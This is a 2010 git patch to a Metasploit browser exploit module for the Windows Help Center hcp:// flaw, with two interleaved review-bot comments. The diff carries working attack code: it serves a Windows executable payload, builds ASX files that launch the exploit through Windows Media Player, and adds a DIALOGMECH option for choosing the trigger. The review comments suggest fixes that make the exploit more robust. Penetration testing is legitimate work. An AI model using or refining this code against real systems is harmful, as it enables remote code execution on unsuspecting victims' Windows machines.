From 7cbc566c7b73dc23b8868b4a1cf940eee3609a12 Mon Sep 17 00:00:00 2001
From: natron <>
Date: Fri, 11 Jun 2010 20:54:35 +0000
Subject: [PATCH] Bug fixes for WMP11 and IE8, new configurable setting for
exploit trigger, and output cleanup.
git-svn-id: file:///home/svn/framework3/trunk@9495 4d416f70-5f16-0410-b530-b9f4589650da
---
.../browser/ms10_xxx_helpctr_xss_cmd_exec.rb | 100 +++++++++---------
1 file changed, 49 insertions(+), 51 deletions(-)
diff --git a/modules/exploits/windows/browser/ms10_xxx_helpctr_xss_cmd_exec.rb b/modules/exploits/windows/browser/ms10_xxx_helpctr_xss_cmd_exec.rb
index 9e724908ce..5c5c0f2d7c 100644
--- a/modules/exploits/windows/browser/ms10_xxx_helpctr_xss_cmd_exec.rb
+++ b/modules/exploits/windows/browser/ms10_xxx_helpctr_xss_cmd_exec.rb
@@ -19,7 +19,6 @@ class Metasploit3 < Msf::Exploit::Remote
#
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::EXE
- include Msf::Exploit::CmdStagerVBS
def initialize(info = {})
super(update_info(info,
@@ -30,13 +29,15 @@ class Metasploit3 < Msf::Exploit::Remote
directly via URLs by installing a protocol handler for the scheme "hcp". Due to
an error in validation of input to hcp:// combined with a local cross site
scripting vulnerability and a specialized mechanism to launch the XSS trigger,
- arbitrary command execution can be achieved.
+ arbitrary command execution can be achieved.
- On IE6 and IE7 on XP SP2 or SP3, code execution is automatic. On IE8, a dialog
- box pops, but if WMP9 is installed, WMP9 can be used for automatic execution.
- If IE8 and WMP11, a dialog box will ask the user if execution should continue.
- Automatic detection of these options is implemented in this module, and will
- default to not sending the exploit for IE8/WMP11 unless the option is overridden.
+ On IE7 on XP SP2 or SP3, code execution is automatic. If WMP9 is installed, it
+ can be used to launch the exploit automatically. If IE8 and WMP11, either can
+ be used to launch the attack, but both pop dialog boxes asking the user if
+ execution should continue. This exploit detects if non-intrusive mechanisms are
+ available and will use one if possible. In the case of both IE8 and WMP11, the
+ exploit defaults to using an iframe on IE8, but is configurable by setting the
+ DIALOGMECH option to "none" or "player".
},
'Author' =>
[
@@ -63,20 +64,16 @@ class Metasploit3 < Msf::Exploit::Remote
'Platform' => 'win',
'Targets' =>
[
- [ 'Automatic', { } ], # Only automatic for now.
- #[ 'IE6/IE7', { 'trigger_method' => 'iframe' } ], # Only tested IE7 / XP SP2,3
- #[ 'IE8/WMP9', { 'trigger_method' => 'asx' } ], # untested
- #[ 'IE8/WMP11', { 'trigger_method' => 'asx' } ], # tested, pops dialog box
+ [ 'Automatic', { } ]
],
'DisclosureDate' => 'June 09, 2010',
'DefaultTarget' => 0))
register_options(
[
- #OptString.new( 'CMD', [ true, "The URI-encoded command to execute.", "calc.exe" ]),
- OptBool.new( 'RUNWITHDIALOG', [ true, "Proceed with exploit even if it will pop a dialog to the user?", false]),
OptPort.new( 'SRVPORT', [ true, "The daemon port to listen on", 80 ]),
- OptString.new( 'URIPATH', [ true, "The URI to use.", "/" ])
+ OptString.new( 'URIPATH', [ true, "The URI to use.", "/" ]),
+ OptString.new( 'DIALOGMECH', [ true, "IE8/WMP11 trigger mechanism (none, iframe, or player).", "iframe"])
], self.class)
deregister_options('SSL', 'SSLVersion') # Just for now
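Review bot: DIALOGMECH is registered as a free-form OptString even though its own description enumerates exactly three legal values (none, iframe, player), so a typo such as "iframes" is accepted at option-set time and only surfaces, if at all, wherever the value is dispatched on later in the file (outside this hunk). Metasploit's OptEnum validates the value against a fixed list and documents the choices for the user; the registration would become `OptEnum.new('DIALOGMECH', [ true, "IE8/WMP11 trigger mechanism.", 'iframe', ['none', 'iframe', 'player'] ])`. The removed RUNWITHDIALOG option is presumably superseded by the "none" value; a one-line comment above the new option saying so would help anyone upgrading an existing resource script.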
@@ -112,16 +109,12 @@ class Metasploit3 < Msf::Exploit::Remote
def process_get(cli, request)
- #print_status("Responding to GET request from #{cli.peerhost}:#{cli.peerport}")
-
@my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
-
webdav_loc = "\\\\#{@my_host}\\#{@random_dir}\\#{@payload}"
-
@url_base = "http://" + @my_host
if (Regexp.new(Regexp.escape(@payload)+'$', true).match(request.uri))
- print_status "GET for payload received."
+ print_status "Sending payload executable to target ..."
return if ((p = regenerate_payload(cli)) == nil)
data = Msf::Util::EXE.to_win32pe(framework, p.encoded)
@@ -130,20 +123,27 @@ class Metasploit3 < Msf::Exploit::Remote
return
end
+ if request.uri.match(/\.gif$/)
+ # "world's smallest gif"
+ data = "GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00!\xF9\x04\x01"
+ data += "\x00\x00\x00\x00,\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02D\x01\x00;"
+ print_status "Sending gif image to WMP at #{cli.peerhost}:#{cli.peerport} ..."
+ send_response(cli, data, { 'Content-TYpe' => 'image/gif' } )
+ end
# ASX Request Inbound
if request.uri.match(/\.asx$/)
asx = %Q|
-
+
|
-#
asx.gsub!(/URLBASE/, @url_base)
asx.gsub!(/STARTHELP/, @random_dir + "/" + @start_help)
- print_status("ASX file requested. Responding to #{cli.peerhost}:#{cli.peerport}...")
+ asx.gsub!(/IMGFILE/, @random_dir + "/" + @img_file)
+ print_status("Sending asx file to #{cli.peerhost}:#{cli.peerport} ...")
send_response(cli, asx, { 'Content-Type' => 'text/html' })
return
end
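Review bot: The new `.gif` branch does not `return` after `send_response`, unlike the payload and asx branches around it, so the request keeps flowing into the later `request.uri.match(...)` checks and may be answered twice if one of the unanchored patterns further down also matches. The header hash on the `send_response` line also misspells the key as `'Content-TYpe'`, inconsistent with `'Content-Type'` used for the asx response below; the two lines should read `send_response(cli, data, { 'Content-Type' => 'image/gif' })` followed by `return`. While here, `/\.gif$/` and `/\.asx$/` anchor on end-of-line rather than end-of-string; `\z` is the stricter form for routing on a URI. process_get itself begins in the previous hunk and ends past this one.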
@@ -152,12 +152,8 @@ class Metasploit3 < Msf::Exploit::Remote
if request.uri.match(/#{@start_help}/)
help_html = %Q|